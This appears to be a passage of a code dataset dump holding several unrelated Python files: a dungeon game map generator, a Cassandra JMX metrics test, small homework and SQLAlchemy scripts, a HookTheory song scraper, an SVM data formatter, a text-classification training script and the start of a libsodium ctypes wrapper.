[]\n map_filling.extend([self.game_entities['cell'] for count in range(empty_cells_count)])\n map_filling.extend([self.game_entities['trap'] for count in range(trap_count)])\n map_filling.extend([self.game_entities['treasure'] for count in range(treasures_count)])\n\n shuffle(map_filling)\n\n return map_filling\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def spawn_player(self, map_filling):\n \"\"\"\n randomly puts player on generated map\n :param: generated list of characters - map\n :paramtype: list(string)\n :return: player spawn position \n :return type: (int,int)\n \"\"\"\n is_empty_cell = False\n player_position = 0\n\n while not is_empty_cell:\n player_position = randint(0, len(map_filling) - 1)\n is_empty_cell = map_filling[player_position] in [self.game_entities['trap'],self.game_entities['treasure']]\n\n map_filling[player_position] = self.game_entities['player']\n\n player_start_position_x = player_position // self.map_size_x\n player_start_position_y = player_position % self.map_size_x\n\n return [player_start_position_x,player_start_position_y]\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def generate_map(self):\n \"\"\"\n transforms list of characters to matrix - list of lists\n :param map_size_x: number of columns\n :param map_size_y: number of rows\n :paramtype map_size_x, map_size_y: int\n \"\"\"\n map_square = self.map_size_x * self.map_size_y\n map_characters_list = self.generate_characters(map_square)\n self.player_spawned_position = self.spawn_player(map_characters_list)\n self.generated_map = [map_characters_list[i*self.map_size_x:(i+1)*self.map_size_x] for i in range(self.map_size_y)]\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def __init__(self, map_size_x, map_size_y):\n\n self.map_size_x = map_size_x\n self.map_size_y = map_size_y\n\n self.player_spawned_position = []\n self.generated_map = []\n\n self.generate_map()\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def print_map(self):\n \"\"\"\n prints map\n :param generated_map: map of characters list of lists\n :paramtype generated_map: list(list(string))\n :return: nothing\n :return type: None\n \"\"\"\n for row in self.generated_map:\n print(''.join(row))\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def mark_path(self, position):\n \"\"\"\n marks the visited cells with +\n :param position: cell coordinates to mark\n :paramtype: list[int,int]\n \"\"\"\n x = position[0]\n y = position[1]\n try:\n self.generated_map[x][y] = '+'\n \n except IndexError as index_error:\n logger.logging_object.error(index_error)\n\n\t\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def get_current_cell_status(self, status):\n \"\"\"\n retrieves the string-name of the cell element\n :param status: one the character of game_entities\n :paramtype: str\n :return: corresponding key from game_entities for character param\n :rtype: str\n \"\"\"\n searched_value = str()\n\n for k, v in self.game_entities.items():\n if v == status:\n searched_value = k\n break\n\n return searched_value\n\n\n @logger_decorator.time_logger_decorator\n @logger_decorator.debug_logger_decorator\n def reinit(self, loaded_map, map_size):\n \"\"\"\n assigns new values to generated_map and map_size_x,map_size_y\n :param loaded_map: loaded map\n :paramtype loaded_map: list(list(str))\n :param map_size: loaded map_size \n :paramtype map_size: list(int,int)\n \"\"\"\n self.generated_map = []\n self.generated_map.extend(loaded_map)\n self.map_size_x = map_size[0]\n self.map_size_y = map_size[1]\n\t\n\nif __name__ == '__main__':\n\n m = DungeonGameMap(5,5)\n m.print_map()\n\n","sub_path":"Masha_Mumrenko/10/dungeon_game_pkg_bonbony/build/lib/dungeon_game_pkg_bonbony/map_creator.py","file_name":"map_creator.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"560528679","text":"from dtest import Tester\nfrom jmxutils import JolokiaAgent, make_mbean, remove_perf_disable_shared_mem\nfrom tools import debug, known_failure, require\n\n\n# We currently only have attributes that are incrementing.\n# MBEAN_VALUES are expressed in tuple with the first value being the class, then the type,\n# a dictionary of arguments for make_mbean(), the attribute, and then the value.\n# MBEAN_VALUES_PRE are values for up to release 2.2, MBEAN_VALUES_POST are for 3.0 and later.\n# In 3.0 \"ColumnFamily\" has been renamed to \"Table\" and \"Row\" to \"Partition\".\n# However, the old names are also supported for backward compatibility and we test them via\n# the mbean aliases, see begin_test().\ndef MBEAN_VALUES_PRE(ks, table, node):\n return [('db', 'Caches', {}, 'CounterCacheKeysToSave', 2147483647),\n ('db', 'Caches', {}, 'CounterCacheSavePeriodInSeconds', 7200),\n ('db', 'BatchlogManager', {}, 'TotalBatchesReplayed', 0),\n ('db', 'Caches', {}, 'RowCacheSavePeriodInSeconds', 0),\n ('db', 'IndexSummaries', {}, 'MemoryPoolSizeInMB', 'MBeanIncrement'),\n ('db', 'IndexSummaries', {}, 'IndexIntervals', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'AllMemtablesLiveDataSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'AllMemtablesHeapSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'AllMemtablesOffHeapSize'}, 'Value', offheap_memtable_val(node)),\n ('metrics', 'ColumnFamily', {'name': 'BloomFilterDiskSpaceUsed'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'BloomFilterFalsePositives'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'IndexSummaryOffHeapMemoryUsed'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'LiveDiskSpaceUsed'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'LiveSSTableCount'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'MemtableColumnsCount'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'MemtableLiveDataSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'MemtableOnHeapSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'MemtableSwitchCount'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'ColumnFamily', {'name': 'MemtableOffHeapSize'}, 'Value', offheap_memtable_val(node)),\n ('metrics', 'ColumnFamily', {'name': 'PendingCompactions'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'MaxRowSize'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'MinRowSize'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'MeanRowSize'}, 'Value', 'MBeanDecrement'),\n ('metrics', 'ColumnFamily', {'name': 'RowCacheHit'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'RowCacheHitOutOfRange'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'RowCacheMiss'}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'EstimatedRowSizeHistogram', 'keyspace': ks, 'scope': table}, 'Value', 'MBeanEqual'),\n ('metrics', 'ColumnFamily', {'name': 'EstimatedRowCount', 'keyspace': ks, 'scope': table}, 'Value', 'MBeanEqual')]\n\n\ndef MBEAN_VALUES_POST(ks, table, node):\n return [('db', 'Caches', {}, 'CounterCacheKeysToSave', 2147483647),\n ('db', 'Caches', {}, 'CounterCacheSavePeriodInSeconds', 7200),\n ('db', 'BatchlogManager', {}, 'TotalBatchesReplayed', 0),\n ('db', 'Caches', {}, 'RowCacheSavePeriodInSeconds', 0),\n ('db', 'IndexSummaries', {}, 'MemoryPoolSizeInMB', 'MBeanIncrement'),\n ('db', 'IndexSummaries', {}, 'IndexIntervals', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'AllMemtablesLiveDataSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'AllMemtablesHeapSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'AllMemtablesOffHeapSize'}, 'Value', offheap_memtable_val(node)),\n ('metrics', 'Table', {'name': 'BloomFilterDiskSpaceUsed'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'BloomFilterFalsePositives'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'IndexSummaryOffHeapMemoryUsed'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'LiveDiskSpaceUsed'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'LiveSSTableCount'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'MemtableColumnsCount'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'MemtableLiveDataSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'MemtableOnHeapSize'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'MemtableSwitchCount'}, 'Value', 'MBeanIncrement'),\n ('metrics', 'Table', {'name': 'MemtableOffHeapSize'}, 'Value', offheap_memtable_val(node)),\n ('metrics', 'Table', {'name': 'PendingCompactions'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'MaxPartitionSize'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'MinPartitionSize'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'MeanPartitionSize'}, 'Value', 'MBeanDecrement'),\n ('metrics', 'Table', {'name': 'RowCacheHit'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'RowCacheHitOutOfRange'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'RowCacheMiss'}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'EstimatedPartitionSizeHistogram', 'keyspace': ks, 'scope': table}, 'Value', 'MBeanEqual'),\n ('metrics', 'Table', {'name': 'EstimatedPartitionCount', 'keyspace': ks, 'scope': table}, 'Value', 'MBeanEqual')]\n\n\ndef offheap_memtable_val(node):\n memtable_allocation_type = node.get_conf_option('memtable_allocation_type')\n offheap_memtable = memtable_allocation_type is not None and memtable_allocation_type.startswith('offheap')\n return 'MBeanIncrement' if offheap_memtable else 'MBeanEqual'\n\n\nclass TestJMXMetrics(Tester):\n\n def __init__(self, *args, **kwargs):\n Tester.__init__(self, *args, **kwargs)\n\n @known_failure(failure_source='test',\n jira_url='https://issues.apache.org/jira/browse/CASSANDRA-10845',\n notes='depends on a number of invalid assumptions about metrics')\n @require('10845')\n def begin_test(self):\n \"\"\"\n @jira_ticket CASSANDRA-7436\n This test measures the values of MBeans before and after running a load. We expect\n the values to change a certain way, and thus deem them as 'MBeanEqual','MBeanDecrement',\n 'MBeanIncrement', or a constant to express this expected change. If the value does not reflect\n this expected change, then it raises an AssertionError.\n\n @jira_ticket CASSANDRA-9448\n This test also makes sure to cover all metrics that were renamed by CASSANDRA-9448, in post 3.0\n we also check that the old alias names are the same as the new names.\n \"\"\"\n cluster = self.cluster\n cluster.populate(1)\n node = cluster.nodelist()[0]\n remove_perf_disable_shared_mem(node)\n cluster.start(wait_for_binary_proto=True)\n session = self.patient_cql_connection(node)\n self.create_ks(session, 'keyspace1', 1)\n session.execute(\"\"\"\n CREATE TABLE keyspace1.counter1 (\n key blob,\n column1 ascii,\n value counter,\n PRIMARY KEY (key, column1)\n ) WITH COMPACT STORAGE\n AND CLUSTERING ORDER BY (column1 ASC)\n AND caching = {'keys': 'ALL', 'rows_per_partition': 'NONE'}\n AND comment = ''\n AND compaction = {'min_threshold': '4', 'class': 'org.apache.cassandra.db.compaction.SizeTieredCompactionStrategy', 'max_threshold': '32'}\n AND compression = {}\n AND dclocal_read_repair_chance = 0.1\n AND default_time_to_live = 0\n AND gc_grace_seconds = 864000\n AND max_index_interval = 2048\n AND memtable_flush_period_in_ms = 0\n AND min_index_interval = 128\n AND read_repair_chance = 0.0\n AND speculative_retry = 'NONE';\n \"\"\")\n\n with JolokiaAgent(node) as jmx:\n debug(\"Cluster version {}\".format(cluster.version()))\n if cluster.version() <= '2.2.X':\n mbean_values = MBEAN_VALUES_PRE('keyspace1', 'counter1', node)\n mbean_aliases = None\n else:\n mbean_values = MBEAN_VALUES_POST('keyspace1', 'counter1', node)\n mbean_aliases = MBEAN_VALUES_PRE('keyspace1', 'counter1', node)\n\n before = []\n for package, bean, bean_args, attribute, expected in mbean_values:\n mbean = make_mbean(package, type=bean, **bean_args)\n debug(mbean)\n before.append(jmx.read_attribute(mbean, attribute))\n\n if mbean_aliases:\n alias_counter = 0\n for package, bean, bean_args, attribute, expected in mbean_aliases:\n mbean = make_mbean(package, type=bean, **bean_args)\n debug(mbean)\n self.assertEqual(before[alias_counter], jmx.read_attribute(mbean, attribute))\n alias_counter += 1\n\n node.stress(['write', 'n=100K', 'no-warmup'])\n\n errors = []\n after = []\n attr_counter = 0\n for package, bean, bean_args, attribute, expected in mbean_values:\n mbean = make_mbean(package, type=bean, **bean_args)\n a_value = jmx.read_attribute(mbean, attribute)\n after.append(a_value)\n b_value = before[attr_counter]\n if expected == 'MBeanIncrement':\n if b_value >= a_value:\n errors.append(mbean + \" has a before value of \" + str(b_value) + \" and after value of \" + str(a_value) + \" and did not increment\" + \"\\n\")\n elif expected == 'MBeanDecrement':\n if b_value <= a_value:\n errors.append(mbean + \" has a before value of \" + str(b_value) + \" and after value of \" + str(a_value) + \" and did not decrement\" + \"\\n\")\n elif expected == 'MBeanEqual':\n if b_value != a_value:\n errors.append(mbean + \" has a before value of \" + str(b_value) + \" and after value of \" + str(a_value) + \", which are not equal\" + \"\\n\")\n elif expected == 'MBeanZero':\n if not (b_value == 0 and a_value == 0):\n errors.append(mbean + \" has a before value of \" + str(b_value) + \" and after value of \" + str(a_value) + \" and they do not equal zero\" + \"\\n\")\n # If expected is none of the above, then expected should be a number.\n else:\n if a_value != expected:\n errors.append(mbean + \" has an after value of \" + str(a_value) + \" which does not equal \" + str(expected) + \"\\n\")\n attr_counter += 1\n\n self.assertEqual(len(errors), 0, \"\\n\" + \"\\n\".join(errors))\n\n if mbean_aliases:\n alias_counter = 0\n for package, bean, bean_args, attribute, expected in mbean_aliases:\n mbean = make_mbean(package, type=bean, **bean_args)\n self.assertEqual(after[alias_counter], jmx.read_attribute(mbean, attribute))\n alias_counter += 1\n","sub_path":"jmxmetrics_test.py","file_name":"jmxmetrics_test.py","file_ext":"py","file_size_in_byte":12210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"136435966","text":"#Asking the user for the length of the list\r\nlength = int(input(\"Enter length of list\"))\r\nlength_for_while_loop = length\r\nlist1 = []\r\n#Getting the user to input the elements of the list\r\nprint(\"Enter elements of list\")\r\nwhile length_for_while_loop != 0:\r\n new_element = input()\r\n list1.append(new_element)\r\n length_for_while_loop -= 1\r\nprint(\"The list that you entered is:\")\r\nprint(list1)\r\nmiddle = length//2\r\nprint(\"The list after swapping the first half and the second half:\")\r\nnewlist = list1[middle:length] + list1[0:middle]\r\nprint(newlist)","sub_path":"Homeworks/Day 2 HW 1.py","file_name":"Day 2 HW 1.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"332359603","text":"from learn_Scientific import RLagent_Scientific\nfrom Env.Environment import Environment, Workflow\nfrom ScientificWorkflow.XMLProcess import XMLtoDAG\nimport copy\n\ntaskCount = 30\nalpha = 0.6\nDAG = XMLtoDAG(\"../ScientificWorkflow/LIGO_30.xml\", taskCount=taskCount).getDAG()\nmontageWorklfow = Workflow(taskCount=taskCount, alpha=alpha, DAG=DAG)\nenv = Environment(taskCount=taskCount, alpha=alpha, workflow=montageWorklfow)\n\n\nmt = RLagent_Scientific(env, taskCount, alpha, hiddenSize=80, perfix='LIGO')\nmt.epsilon = 0.3\nmt.epsilon_end = 0.05\nmt.epsilon_decay = 200\n\nmt.train()\n","sub_path":"TrainModel/LIGOTrain.py","file_name":"LIGOTrain.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"430243857","text":"from sqlalchemy import (select, create_engine)\ndef main():\n engine = create_engine('sqlite:///cookies1.db', echo=True)\n connection = engine.connect()\n s = select([cookies])\n rp = connection.execute(s)\n results = rp.fetchall()\n\n\n\nif __name__ == \"__main__\":main()\n","sub_path":"SqlAlchemy/Ch2A2RetrievingData.py","file_name":"Ch2A2RetrievingData.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"111899041","text":"import requests\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom bs4 import BeautifulSoup\nimport os\nimport time\nimport json\nimport re\nimport string\n\nwebsite = 'https://www.hooktheory.com'\nbase_url = website + '/theorytab/artists/'\nsleep_time = 0.11\n# alphabet_list = string.ascii_lowercase\nalphabet_list = 'qrstuvwxyz'\nroot_dir = '../datasets'\nroot_xml = '../datasets/xml'\n\n\ndef song_retrieval(artist, song, path_song):\n suffix = '/theorytab/view/' + artist + '/' + song\n song_url = song_url = 'https://www.hooktheory.com' + suffix\n response_song = requests.get(song_url)\n\n soup = BeautifulSoup(response_song.text, 'html.parser')\n\n section_list = [item['href'].split('#')[-1] for item in soup.find_all('a', {'href': re.compile(suffix+'#')})]\n tab_list = soup.find_all('div', {'id': re.compile(\"tab-\")})\n pk_list = [item.get('id').split('-')[-1] for item in tab_list]\n # save xml\n for idx, pk in enumerate(pk_list):\n req_url = 'https://www.hooktheory.com/songs/getXmlByPk?pk=' + str(pk)\n response_info = requests.get(req_url)\n content = response_info.text\n with open(os.path.join(path_song, section_list[idx] + \".xml\"), \"w\", encoding=\"utf-8\") as f:\n f.write(content)\n time.sleep(0.08)\n\n # get genre\n wikiid = soup.findAll(\"multiselect\", {\"items\": \"genres\"})[0]['wikiid']\n response_genre = requests.get('https://www.hooktheory.com/wiki/' + str(wikiid) + '/genres')\n genre_act_list = json.loads(response_genre.text)\n genres = []\n for g in genre_act_list:\n if g['active']:\n genres.append(g['name'])\n\n # saving\n info = {'section': section_list, 'pk': pk_list, 'song_url': song_url,\n 'genres': genres, 'wikiid': wikiid}\n\n with open(os.path.join(path_song, 'song_info.json'), \"w\") as f:\n json.dump(info, f)\n return artist, song, path_song\n\ndef get_song_list(url_artist):\n artist_name = url_artist.split('/')[-1]\n response_tmp = requests.get(website + url_artist)\n soup = BeautifulSoup(response_tmp.text, 'html.parser')\n item_list = soup.find_all(\"li\", {\"class\": re.compile(\"overlay-trigger\")})\n\n song_name_list = []\n for item in item_list:\n song_name = item.find_all(\"a\", {\"class\": \"a-no-decoration\"})[0]['href'].split('/')[-1]\n song_name_list.append(song_name)\n return artist_name, song_name_list\n\ndef traverse_website():\n '''\n Retrieve all urls of artists and songs from the website\n '''\n\n list_pages = []\n archive_artist = dict()\n artist_count = 0\n song_count = 0\n\n for ch in alphabet_list:\n url = base_url + ch\n response_tmp = requests.get(url)\n soup = BeautifulSoup(response_tmp.text, 'html.parser')\n page_count = 0\n\n print('==[%c]=================================================' % ch)\n\n # get artists list by pages\n url_artist_list = []\n for page in range(1, 9999):\n url = 'https://www.hooktheory.com/theorytab/artists/'+ch+'?page=' + str(page)\n print(url)\n response_tmp = requests.get(url)\n soup = BeautifulSoup(response_tmp.text, 'html.parser')\n item_list = soup.find_all(\"li\", {\"class\": re.compile(\"overlay-trigger\")})\n\n if item_list:\n page_count += 1\n else:\n break\n\n for item in item_list:\n url_artist_list.append(item.find_all(\"a\", {\"class\": \"a-no-decoration\"})[0]['href'])\n\n print('Total:', len(url_artist_list))\n\n print('----')\n\n if not page_count:\n page_count = 1\n\n # get song of artists\n artist_song_dict = dict()\n \n def artist_song_map(url_artist):\n try: return get_song_list(url_artist)\n except Exception as e:\n print('Error:', url_artist, e)\n return None, None\n \n with ThreadPoolExecutor(max_workers=10) as executor:\n for url_artist, song_name_list in executor.map(artist_song_map, url_artist_list):\n if url_artist is None: continue\n artist_count += 1\n song_count += len(song_name_list)\n artist_name = url_artist.split('/')[-1]\n artist_song_dict[artist_name] = song_name_list\n \n print(artist_name)\n print(' > ' + '\\n > '.join(song_name_list))\n \n archive_artist[ch] = artist_song_dict\n list_pages.append(page_count)\n\n print('=======================================================')\n print(list_pages)\n print('Artists:', artist_count)\n print('Songs:', song_count)\n\n archive_artist['num_song'] = song_count\n archive_artist['num_artist'] = artist_count\n\n return archive_artist\n\n\nif __name__ == '__main__':\n\n if not os.path.exists(root_dir):\n os.makedirs(root_dir)\n\n if not os.path.exists(root_xml):\n os.makedirs(root_xml)\n\n path_artists = os.path.join(root_dir, 'archive_artist.json')\n \n archive_artist = traverse_website()\n \n # Merge old json\n if os.path.exists(root_xml):\n with open(path_artists, \"r\") as f:\n archive_artist = {**json.load(f), **archive_artist}\n \n with open(path_artists, \"w\") as f:\n json.dump(archive_artist, f)\n\n with open(path_artists, \"r\") as f:\n archive_artist = json.load(f)\n\n song_count = archive_artist['num_song']\n\n\n for ch in alphabet_list:\n path_ch = os.path.join(root_xml, ch)\n print('==[%c]=================================================' % ch)\n\n if not os.path.exists(path_ch):\n os.makedirs(path_ch)\n\n songs = []\n for a_name, s_list in archive_artist[ch].items():\n for s_name in s_list:\n path_song = os.path.join(path_ch, a_name, s_name)\n if os.path.exists(path_song): continue\n songs.append((a_name, s_name, path_song))\n\n def song_map(args):\n os.makedirs(args[-1], exist_ok=True)\n try: return song_retrieval(*args)\n except Exception as e:\n print('Error:', args, e)\n return None, None, None\n\n with ThreadPoolExecutor(max_workers=10) as executor:\n for idx, (artist, song, path_song) in enumerate(executor.map(song_map, songs)):\n if artist is None: continue\n print('(%3d/%3d) %s %s' % (idx, len(songs), artist, song))","sub_path":"src/theorytab_crawler.py","file_name":"theorytab_crawler.py","file_ext":"py","file_size_in_byte":6484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"281627357","text":"import numpy\nimport itertools\n\nfc7 = numpy.load('./PIPA_300kclothing_val_feature_01_new.npy')\nfk = open('/home/ytshen/work/datasets/PIPA/body_svm_01_new.txt','r')\nfl = open('./svm_300kclothing_train_01_new.txt','w')\nclass_temp = []\nread_from_ori = fk.readlines()\nfinal_opt = [[]]\n\n\n############################################\nfor i in range(len(read_from_ori)):\n\tb = read_from_ori[i].split(' ')\n\ttemp_id = b[1].strip()\n\tclass_temp.append(temp_id)\n\n\n###########################################\n# for i in range(len(fc7) - len(read_from_ori)):\n# \tb = read_from_ori[i].split(' ')\n# \ttemp_id = b[1].strip()\n# \tclass_temp.append(temp_id)\n############################################\n\n\nfor i in range(len(fc7)):\n\tfinal_opt[i].append(class_temp[i])\n\tfinal_opt.append([])\n\tfor j in range(len(fc7[i])):\n\t\tfinal_opt[i].append(' ')\n\t\tfinal_opt[i].append('%d' % (j+1))\n\t\tfinal_opt[i].append(':')\n\t\tfinal_opt[i].append('%f' % fc7[i][j])\n\n\tfinal_opt[i].append('\\n')\n\nfinal_opt.remove(final_opt[len(final_opt)-1])\t\n\nfk.close()\n\n\n\n#############################################\nfor i in range(len(final_opt)):\n\ttemp_str = \"\".join(final_opt[i])\n\tfl.write(temp_str)\n\nfl.close()\n\n\n\n\n","sub_path":"generate_data_for_svm.py","file_name":"generate_data_for_svm.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"202767346","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n# @time : 2021/2/23 21:34\n# @author : Mo\n# @function: 多类分类, 根据label是否有|myz|分隔符判断是多类分类, 还是多标签分类\n\n\n# 适配linux\nimport platform\nimport json\nimport sys\nimport os\npath_root = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../..\"))\npath_sys = os.path.join(path_root, \"pytorch_nlu\", \"pytorch_textclassification\")\nprint(path_root)\n# 分类下的引入, pytorch_textclassification\nfrom tcTools import get_current_time\nfrom tcRun import TextClassification\nfrom tcConfig import model_config\n\n\n# 预训练模型地址, 本地win10默认只跑2步就评估保存模型\nif platform.system().lower() == 'windows':\n pretrained_model_dir = \"D:/pretrain_models/pytorch\"\n evaluate_steps = 2 # 评估步数\n save_steps = 2 # 存储步数\nelse:\n pretrained_model_dir = \"/pretrain_models/pytorch\"\n evaluate_steps = 320 # 评估步数\n save_steps = 320 # 存储步数\n ee = 0\n\n\nif __name__ == \"__main__\":\n # 训练-验证语料地址, 可以只输入训练地址\n path_corpus = os.path.join(path_root, \"corpus\", \"text_classification\", \"tnews\")\n path_train = os.path.join(path_corpus, \"train.json\")\n path_dev = os.path.join(path_corpus, \"dev.json\")\n model_config[\"evaluate_steps\"] = evaluate_steps # 评估步数\n model_config[\"save_steps\"] = save_steps # 存储步数\n model_config[\"path_train\"] = path_train # 训练模语料, 必须\n model_config[\"path_dev\"] = path_dev # 验证语料, 可为None\n model_config[\"path_tet\"] = None # 测试语料, 可为None\n # multi-class: 可选 None(BCE), BCE, BCE_LOGITS, MSE, FOCAL_LOSS, DICE_LOSS, LABEL_SMOOTH, MIX;\n # multi-label: SOFT_MARGIN_LOSS, PRIOR_MARGIN_LOSS, FOCAL_LOSS, CIRCLE_LOSS, DICE_LOSS, MIX等\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(model_config[\"CUDA_VISIBLE_DEVICES\"])\n\n # 预训练模型适配的class\n model_type = [\"BERT\", \"ERNIE\", \"BERT_WWM\", \"ALBERT\", \"ROBERTA\", \"XLNET\", \"ELECTRA\"]\n pretrained_model_name_or_path = {\n \"BERT_WWM\": pretrained_model_dir + \"/chinese_wwm_pytorch\",\n \"ROBERTA\": pretrained_model_dir + \"/chinese_roberta_wwm_ext_pytorch\",\n \"ALBERT\": pretrained_model_dir + \"/albert_base_v1\",\n \"XLNET\": pretrained_model_dir + \"/chinese_xlnet_mid_pytorch\",\n \"ERNIE\": pretrained_model_dir + \"/ERNIE_stable-1.0.1-pytorch\",\n # \"ERNIE\": pretrained_model_dir + \"/ernie-tiny\", # 小模型\n \"BERT\": pretrained_model_dir + \"/bert-base-chinese\",\n }\n idx = 0 # 选择的预训练模型类型---model_type, 0为BERT, 1为ernie\n model_config[\"pretrained_model_name_or_path\"] = pretrained_model_name_or_path[model_type[idx]]\n # model_config[\"model_save_path\"] = \"../output/text_classification/model_{}\".format(model_type[idx] + \"_\" + str(get_current_time()))\n model_config[\"model_save_path\"] = \"../output/text_classification/model_{}\".format(model_type[idx])\n model_config[\"model_type\"] = model_type[idx]\n # main\n lc = TextClassification(model_config)\n lc.process()\n lc.train()\n\n\n# shell\n# nohup python tcRun.py > tc.log 2>&1 &\n# tail -n 1000 -f tc.log\n# |myz|\n\n","sub_path":"test/tc/tet_tc_base_multi_class.py","file_name":"tet_tc_base_multi_class.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"338808385","text":"#!/usr/bin/env python2\n\"\"\"\nWrapper for libsodium library\n\nCopyright (c) 2013-2014, Marsiske Stefan.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n * Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\nANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\nimport ctypes\n\nsodium = ctypes.cdll.LoadLibrary(\"libsodium.so\")\ncrypto_box_NONCEBYTES = 24\ncrypto_box_PUBLICKEYBYTES = 32\ncrypto_box_SECRETKEYBYTES = 32\ncrypto_box_ZEROBYTES = 32\ncrypto_box_BOXZEROBYTES = 16\ncrypto_box_MACBYTES = crypto_box_ZEROBYTES - crypto_box_BOXZEROBYTES\ncrypto_secretbox_KEYBYTES = 32\ncrypto_secretbox_NONCEBYTES = 24\ncrypto_secretbox_KEYBYTES = 32\ncrypto_secretbox_ZEROBYTES = 32\ncrypto_secretbox_BOXZEROBYTES = 16\ncrypto_secretbox_MACBYTES = crypto_secretbox_ZEROBYTES - crypto_secretbox_BOXZEROBYTES\ncrypto_sign_PUBLICKEYBYTES = 32\ncrypto_sign_SECRETKEYBYTES = 64\ncrypto_sign_SEEDBYTES = 32\ncrypto_stream_KEYBYTES = 32\ncrypto_stream_NONCEBYTES = 24\ncrypto_generichash_BYTES = 32\ncrypto_scalarmult_curve25519_BYTES = 32\ncrypto_scalarmult_BYTES = 32\ncrypto_sign_BYTES = 64\n\n\"\"\"\ntypedef struct crypto_generichash_blake2b_state {\n uint64_t h[8];\n uint64_t t[2];\n uint64_t f[2];\n uint8_t 